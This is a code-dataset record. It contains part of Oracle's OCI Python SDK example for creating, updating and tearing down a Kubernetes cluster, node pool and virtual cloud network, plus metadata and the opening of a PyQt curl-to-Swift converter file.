get_kubeconfig(ce_client, cluster_id):\n \"\"\"\n get_kubeconfig\n\n Given a cluster id, retrieve the kubconfig.\n \"\"\"\n\n response = ce_client.create_kubeconfig(cluster_id)\n\n # response.data.text contains the contents of the kubeconfig file which\n # can be writen to a file using code like the following snippet.\n \"\"\"\n with open('kubconfig.txt', 'w') as f:\n f.write(response.data.text)\n \"\"\"\n if response.data.text:\n print(\"kubeconfig retrieved\")\n else:\n print(\"Error retrieving the kubeconfig\")\n\n return\n\n\ndef create_node_pool(ce_client, ads, cluster_id, subnet):\n \"\"\"\n create_node_pool\n\n Creates a node pool inside of a cluser\n \"\"\"\n node_pool_placement_configs_details = []\n for ad in ads:\n node_pool_placement_configs_details.append(oci.container_engine.models.NodePoolPlacementConfigDetails(\n availability_domain=ad,\n subnet_id=subnet)\n )\n\n create_node_pool_node_config_details = oci.container_engine.models.CreateNodePoolNodeConfigDetails(\n size=len(ads),\n placement_configs=node_pool_placement_configs_details\n )\n\n success = True\n node_pool_create_details = oci.container_engine.models.CreateNodePoolDetails(compartment_id=compartment_id,\n cluster_id=cluster_id,\n name=\"PythonSDK_nodepool1\",\n kubernetes_version=get_kubernetes_version(ce_client),\n node_image_name=\"Oracle-Linux-7.4\",\n node_shape=\"VM.Standard2.1\",\n initial_node_labels=[{\"nodes\": \"Example Nodes\"}],\n node_config_details=create_node_pool_node_config_details)\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.create_node_pool_and_wait_for_state(node_pool_create_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # gather the created resources from the work request\n resources = {}\n for resource in response.data.resources:\n resources[resource.entity_type] = resource.identifier\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n success = False\n else:\n print(\"Create node pool succeeded\")\n\n return success, resources\n\n\ndef update_node_pool(ce_client, node_pool_id):\n \"\"\"\n update_node_pool\n\n Currently there are a number of features that can be updated in the node pool.\n This example will only update the name. Please see the documentation for\n the other features which can be updated\n \"\"\"\n\n update_node_pool_details = oci.container_engine.models.UpdateNodePoolDetails(name=\"PythonSDK_noodpool_1\")\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.update_node_pool_and_wait_for_state(node_pool_id,\n update_node_pool_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n else:\n print(\"Update node pool succeeded\")\n\n return\n\n\ndef delete_node_pool(ce_client, node_pool_id):\n \"\"\"\n delete_node_pool\n\n Deletes the specified node pool. The cluster is not deleted.\n \"\"\"\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.delete_node_pool_and_wait_for_state(node_pool_id,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED])\n\n if response.status == 200:\n print(\"Node pool deleted successfully\")\n else:\n print(\"Recieved '{}' when attempting to delete the node pool\".format(response.status))\n\n return\n\n\ndef get_kubernetes_version(ce_client):\n \"\"\"\n get_kubernetes_version\n\n Get the supported kubernetes versions from the service. There are multiple\n versions supported but for the example we will just use the last one in the\n list.\n \"\"\"\n response = ce_client.get_cluster_options(cluster_option_id=\"all\")\n\n versions = response.data.kubernetes_versions\n if len(versions) > 0:\n kubernetes_version = versions[-1]\n else:\n raise RuntimeError(\"No supported Kubernetes versions found\")\n\n return kubernetes_version\n\n################\n# VCN operations\n################\n\n\ndef create_vcn(vn_client, ads, number_of_worker_subnets=1, number_of_lb_subnets=1):\n \"\"\"\n create_vcn\n\n See https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#VCN\n for details on how the VCN should be configured for container engine.\n\n This function will build a Virtual Cloud Network based on the example network resource configuration:\n https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfigexample.htm\n\n The function returns a dictionary containing the id of the VCN created, a list of worker subnets and\n a list of load balancer subnets\n \"\"\"\n\n vcn = {'id': None,\n 'worker_subnets': [],\n 'lb_subnets': []}\n\n subnet_template = \"10.0.{}.0/24\"\n\n vn_composite_ops = oci.core.VirtualNetworkClientCompositeOperations(vn_client)\n\n vcn_details = oci.core.models.CreateVcnDetails(cidr_block='10.0.0.0/16',\n display_name='PythonSDKContainerEngineExampleVcn',\n dns_label='cevcn',\n compartment_id=compartment_id,\n )\n\n result = vn_composite_ops.create_vcn_and_wait_for_state(vcn_details,\n wait_for_states=[oci.core.models.Vcn.LIFECYCLE_STATE_AVAILABLE])\n\n vcn['id'] = result.data.id\n print(\"VCN Id: {}\".format(vcn['id']))\n\n # Setup the gateway\n gateway_details = oci.core.models.CreateInternetGatewayDetails(compartment_id=compartment_id,\n display_name='PythonCE-gateway-0',\n is_enabled=True,\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_internet_gateway_and_wait_for_state(gateway_details,\n wait_for_states=[oci.core.models.InternetGateway.LIFECYCLE_STATE_AVAILABLE])\n\n gateway_id = result.data.id\n print('Gateway Id: {}'.format(gateway_id))\n\n # Setup the route table\n route_table_rule = oci.core.models.RouteRule(cidr_block=None,\n destination='0.0.0.0/0',\n destination_type='CIDR_BLOCK',\n network_entity_id=gateway_id)\n\n route_table_details = oci.core.models.CreateRouteTableDetails(compartment_id=compartment_id,\n display_name='PythonCE-routetable-0',\n route_rules=[route_table_rule],\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_route_table_and_wait_for_state(route_table_details,\n wait_for_states=[oci.core.models.RouteTable.LIFECYCLE_STATE_AVAILABLE])\n\n route_table_id = result.data.id\n print('Route Table Id: {}'.format(route_table_id))\n\n ################\n # Security Lists and Security Rules\n # More information on the security list configuration for container engine can be found here:\n # https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#securitylistconfig\n ################\n\n # Load balancer security rules\n load_balancer_egress_rule = oci.core.models.EgressSecurityRule(destination='0.0.0.0/0',\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions())\n\n load_balancer_ingress_rule = oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions())\n\n load_balancers_security_list_details = oci.core.models.CreateSecurityListDetails(compartment_id=compartment_id,\n display_name='PythonCE-LB-SecurityList',\n egress_security_rules=[load_balancer_egress_rule],\n ingress_security_rules=[load_balancer_ingress_rule],\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_security_list_and_wait_for_state(load_balancers_security_list_details,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE])\n\n load_balancer_security_list_id = result.data.id\n print('Load Balancer Security List Id: {}'.format(load_balancer_security_list_id))\n\n # Worker security rules\n worker_egress_rules = []\n\n for i in range(number_of_worker_subnets):\n destination = subnet_template.format(10 + i)\n worker_egress_rules.append(oci.core.models.EgressSecurityRule(destination=destination,\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='all'))\n\n worker_egress_rules.append(oci.core.models.EgressSecurityRule(destination='0.0.0.0/0',\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='all'))\n worker_ingress_rules = []\n\n for i in range(number_of_worker_subnets):\n source = subnet_template.format(10 + i)\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source=source,\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='all'))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='1',\n icmp_options=oci.core.models.IcmpOptions(type=3, code=4)))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='130.35.0.0/16',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='138.1.0.0/17',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_security_list_details = oci.core.models.CreateSecurityListDetails(compartment_id=compartment_id,\n display_name='PythonCE-Worker-SecurityList',\n egress_security_rules=worker_egress_rules,\n ingress_security_rules=worker_ingress_rules,\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_security_list_and_wait_for_state(worker_security_list_details,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE])\n\n worker_security_list_id = result.data.id\n print('Worker Security List Id: {}'.format(worker_security_list_id))\n\n ################\n # Subnets\n # More information on the subnet configuration for container engine can be found here:\n # https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#subnetconfig\n ################\n\n # Worker subnets\n display_name_template = 'PythonSDKCE-workers-{}'\n dns_label_template = 'workers{}'\n for i in range(number_of_worker_subnets):\n cidr_block = subnet_template.format(10 + i)\n display_name = display_name_template.format(1 + i)\n dns_label = dns_label_template.format(1 + i)\n\n subnet_details = oci.core.models.CreateSubnetDetails(compartment_id=compartment_id,\n cidr_block=cidr_block,\n display_name=display_name,\n dns_label=dns_label,\n vcn_id=vcn['id'],\n route_table_id=route_table_id,\n security_list_ids=[worker_security_list_id])\n\n result = vn_composite_ops.create_subnet_and_wait_for_state(subnet_details,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_AVAILABLE])\n vcn['worker_subnets'].append(result.data.id)\n\n print(\"Worker Subnets: {}\".format(vcn['worker_subnets']))\n\n # Load balancer subnets\n display_name_template = 'PythonSDKCE-loadbalancers-{}'\n dns_label_template = 'loadbalancers{}'\n for i in range(number_of_lb_subnets):\n cidr_block = subnet_template.format(20 + i)\n display_name = display_name_template.format(1 + i)\n dns_label = dns_label_template.format(1 + i)\n subnet_details = oci.core.models.CreateSubnetDetails(compartment_id=compartment_id,\n cidr_block=cidr_block,\n display_name=display_name,\n dns_label=dns_label,\n vcn_id=vcn['id'],\n route_table_id=route_table_id,\n security_list_ids=[load_balancer_security_list_id])\n\n result = vn_composite_ops.create_subnet_and_wait_for_state(subnet_details,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_AVAILABLE])\n vcn['lb_subnets'].append(result.data.id)\n\n print(\"Loadbalancer Subnets: {}\".format(vcn['lb_subnets']))\n\n return vcn\n\n\ndef delete_vcn(vn_client, vcn_resources):\n \"\"\"\n delete_vcn\n\n Deletes the example VCN. There are more resources associated\n with the VCN than passed in with the vcn_resources dictionary. Those\n resources will be discovered and deleted.\n \"\"\"\n\n vn_composite_ops = oci.core.VirtualNetworkClientCompositeOperations(vn_client)\n\n # Delete the load balancer subnets\n print(\"Deleting load balancer subnets...\")\n for subnet in vcn_resources['lb_subnets']:\n vn_composite_ops.delete_subnet_and_wait_for_state(subnet,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_TERMINATED])\n\n # Delete the worker subnets\n print(\"Deleting worker subnets...\")\n for subnet in vcn_resources['worker_subnets']:\n vn_composite_ops.delete_subnet_and_wait_for_state(subnet,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_TERMINATED])\n\n # VCNs have default security lists, route tables which cannot be deleted.\n # Get the details of the VCN to get the default security list and default route table ids so\n # they can be skipped when getting the security lists and route tables\n response = vn_client.get_vcn(vcn_resources['id'])\n default_security_list_id = response.data.default_security_list_id\n default_route_table_id = response.data.default_route_table_id\n\n # Retrieve and delete the security lists\n print(\"Deleting security lists...\")\n # We could just retrieve all of the security lists, but there may be cases where not all of them\n # would come back in a single page. Here is another example of using the pagaination to\n # retrieve items from a list call. More examples are in pagination.py\n for security_list in oci.pagination.list_call_get_all_results_generator(vn_client.list_security_lists,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE):\n if security_list.id != default_security_list_id:\n vn_composite_ops.delete_security_list_and_wait_for_state(security_list.id,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_TERMINATED])\n\n # Retrieve and delete the route tables\n print(\"Deleting route tables...\")\n for route_table in oci.pagination.list_call_get_all_results_generator(vn_client.list_route_tables,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.RouteTable.LIFECYCLE_STATE_AVAILABLE):\n if route_table.id != default_route_table_id:\n vn_composite_ops.delete_route_table_and_wait_for_state(route_table.id,\n wait_for_states=[oci.core.models.RouteTable.LIFECYCLE_STATE_TERMINATED])\n\n # Retrieve and delete the gateway\n print(\"Deleting internet gateways...\")\n for gateway in oci.pagination.list_call_get_all_results_generator(vn_client.list_internet_gateways,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.InternetGateway.LIFECYCLE_STATE_AVAILABLE):\n vn_composite_ops.delete_internet_gateway_and_wait_for_state(gateway.id, wait_for_states=[oci.core.models.InternetGateway.LIFECYCLE_STATE_TERMINATED])\n\n print(\"Deleting virtual cloud network...\")\n response = vn_composite_ops.delete_vcn_and_wait_for_state(vcn_resources['id'],\n wait_for_states=[oci.core.models.Vcn.LIFECYCLE_STATE_TERMINATED])\n\n print(\"VCN {} has been deleted\".format(vcn_resources['id']))\n\n\n#########\n# Helpers\n#########\n\ndef get_work_request_errors(ce_client, compartment_id, work_request_id):\n \"\"\"\n get_work_request_errors\n\n Retrieves the errors for a work request and prints them.\n \"\"\"\n print_header('Work request errors:')\n response = ce_client.list_work_request_errors(compartment_id, work_request_id)\n print(response.data)\n\n\ndef print_header(header):\n \"\"\"\n print_header\n\n Prints a section header\n \"\"\"\n\n print('\\n')\n print(header)\n print(\"=\" * len(header))\n\n\nif __name__ == \"__main__\":\n # Initialize clients\n ce_client = oci.container_engine.ContainerEngineClient(config)\n vn_client = oci.core.VirtualNetworkClient(config)\n id_client = oci.identity.IdentityClient(config)\n\n # Get the Availability Domains for the compartment\n response = id_client.list_availability_domains(compartment_id)\n ads = [x.name for x in response.data]\n\n try:\n ##################\n # Create resources\n ##################\n print_header(\"Create the Virtual Cloud Network\")\n vcn_resources = create_vcn(vn_client, ads)\n print(\"VNC resources: {}\".format(vcn_resources))\n\n print_header(\"Create the Cluster\")\n cluster_success, cluster_resources = create_cluster(ce_client, vcn_resources)\n print(\"Cluster resourse: {}\".format(cluster_resources)),\n\n if cluster_success:\n print_header('Create a node pool')\n node_pool_success, node_pool_resources = create_node_pool(ce_client,\n ads,\n cluster_resources['cluster'],\n vcn_resources['worker_subnets'][0])\n print(\"Node pool resources: {}\".format(node_pool_resources))\n\n if cluster_success:\n print_header(\"Get kubeconf\")\n get_kubeconfig(ce_client, cluster_resources['cluster'])\n\n ##################\n # Update resources\n ##################\n\n if cluster_success:\n print_header(\"Update the Cluster\")\n update_cluster(ce_client, cluster_resources['cluster'])\n\n if cluster_success and node_pool_success:\n print_header('Update the node pool')\n update_node_pool(ce_client, node_pool_resources['nodepool'])\n\n finally:\n ####################\n # Delete resources\n ####################\n\n # Note: Any exceptions caught while trying to clean up resources are printed, but not\n # handled.\n if node_pool_resources:\n print_header('Delete the node pool')\n try:\n delete_node_pool(ce_client, node_pool_resources['nodepool'])\n except Exception as e:\n print(\"Failed to delete node pool: {}\".format(node_pool_resources['nodepool']))\n print(e)\n\n if cluster_resources:\n print_header(\"Delete the Cluster\")\n try:\n delete_cluster(ce_client, cluster_resources['cluster'])\n except Exception as e:\n print(\"Failed to delete cluster: {}\".format(cluster_resources['cluster']))\n print(e)\n\n print_header(\"Delete the Virtual Cloud Network\")\n try:\n delete_vcn(vn_client, vcn_resources)\n except Exception as e:\n print(\"Failed to delete VCN: {}\".format(vcn_resources['id']))\n print(e)\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "examples/container_engine.py", "file_name": "container_engine.py", "file_ext": "py", "file_size_in_byte": 32055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.config.from_file", "line_number": 16, "usage_type": "call"}, {"api_name": "oci.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.KubernetesNetworkConfig", "line_number": 36, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 36, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.ClusterCreateOptions", "line_number": 39, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 39, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateClusterDetails", "line_number": 42, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 42, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 48, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 48, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 51, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 52, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 62, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.UpdateClusterDetails", "line_number": 85, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 85, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 87, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 87, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 91, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 92, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 95, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 109, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 109, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 112, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.NodePoolPlacementConfigDetails", "line_number": 153, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 153, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateNodePoolNodeConfigDetails", "line_number": 158, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 158, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateNodePoolDetails", "line_number": 164, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 164, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 173, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 173, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 176, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 177, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 185, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.UpdateNodePoolDetails", "line_number": 203, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 203, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 205, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 205, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 209, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 210, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 212, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 226, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 226, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 229, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClientCompositeOperations", "line_number": 282, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 282, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateVcnDetails", "line_number": 284, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 284, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 291, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateInternetGatewayDetails", "line_number": 297, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 297, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 303, "usage_type": "attribute"}, {"api_name": "oci.core.models.RouteRule", "line_number": 309, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 309, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateRouteTableDetails", "line_number": 314, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 314, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 320, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 332, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 332, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 333, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 336, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 336, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 338, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 338, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 339, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 342, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 342, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSecurityListDetails", "line_number": 344, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 344, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 351, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 361, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 361, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 362, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 366, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 366, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 367, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 374, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 374, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 379, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 379, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 380, "usage_type": "attribute"}, {"api_name": "oci.core.models.IcmpOptions", "line_number": 383, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 383, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 385, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 385, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 386, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 389, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 389, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 389, "usage_type": "call"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 391, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 391, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 392, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 395, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 397, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 397, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 398, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 401, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 401, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 401, "usage_type": "call"}, {"api_name": "oci.core.models.CreateSecurityListDetails", "line_number": 403, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 403, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 410, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSubnetDetails", "line_number": 429, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 429, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 438, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSubnetDetails", "line_number": 450, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 450, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 459, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClientCompositeOperations", "line_number": 476, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 476, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 482, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 488, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 502, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 502, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 506, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 509, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 513, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 513, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 517, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 520, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 524, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 524, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 528, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 529, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 533, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClient", "line_number": 567, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 567, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClient", "line_number": 568, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 568, "usage_type": "attribute"}, {"api_name": "oci.identity.IdentityClient", "line_number": 569, "usage_type": "call"}, {"api_name": "oci.identity", "line_number": 569, "usage_type": "attribute"}]} +{"seq_id": "31293825770", "text": "from curl2swift.layers.presentation.swift_highlighter import SwiftHighlighter\nfrom curl2swift.layers.presentation.curl_highlighter import CurlHighlighter\nfrom PyQt5 import QtCore\nfrom curl2swift.layers.presentation.dynamic_parameters_selector_view import (\n DynamicParamsSelectorView,\n)\nfrom curl2swift.__main__ import main\n\nfrom curl2swift.layers.presentation.content_presenter import (\n ContentPresenter,\n ViewModel,\n)\nfrom typing import NamedTuple\n\nfrom PyQt5.QtWidgets import (\n QCheckBox,\n QFormLayout,\n QFrame,\n QHBoxLayout,\n QLabel,\n QLineEdit,\n QPlainTextEdit,\n QPushButton,\n QSplitter,\n QTabWidget,\n QVBoxLayout,\n QWidget,\n)\n\nEXAMPLE_CURL = \"\"\"\ncurl --location --request POST 'https://www.host.com/path/{pathParam}/morePath?queryParam=value' \\\\\n--header 'Accept-Encoding: gzip;q=1.0, compress;q=0.5' \\\\\n--header 'Accept-Language: en;q=1.0, cs-CZ;q=0.9' \\\\\n--header 'Content-Type: application/x-www-form-urlencoded' \\\\\n--header 'Authorization: Bearer TOKEN' \\\\\n--data-urlencode 'key_1=value_1' \\\\\n--data-urlencode 'key_2=value_2'\n\"\"\".strip()\n\n\nclass UserInput(NamedTuple):\n request_name: str\n description: str\n curl: str\n\n\nclass ContentView(QWidget):\n\n # --- Properties ---\n info_labels = []\n\n @property\n def user_input(self):\n request_name = self.request_name_input.text()\n description = self.description_input.text()\n curl = self.curl_text_edit.toPlainText()\n return UserInput(request_name, description, curl)\n\n # --- Init ---\n def __init__(self, screen_width):\n super().__init__()\n self.presenter = ContentPresenter(\n self.on_output_change, self.on_dynamic_values_change\n )\n self.selector = DynamicParamsSelectorView(self.presenter)\n self._layout_views()\n self._bind_interactions()\n self.curl_text_edit.setPlainText(EXAMPLE_CURL)\n\n # --- Setup ---\n def _layout_views(self):\n layout = QHBoxLayout()\n self.splitter = QSplitter()\n layout.addWidget(self.splitter)\n\n self._setup_input_part()\n self._setup_output_part()\n\n self.setLayout(layout)\n\n self.left_half_layout.addWidget(self.selector)\n\n def _setup_input_part(self):\n self.request_name_input = QLineEdit()\n self.request_name_input.setText(\"Example\")\n self.request_name_input.setMinimumWidth(200)\n self.description_input = QLineEdit()\n self.description_input.setMinimumWidth(200)\n self.curl_text_edit = QPlainTextEdit()\n self.highlight = CurlHighlighter(self.curl_text_edit.document())\n self.description_input.setText(\"Add description\")\n 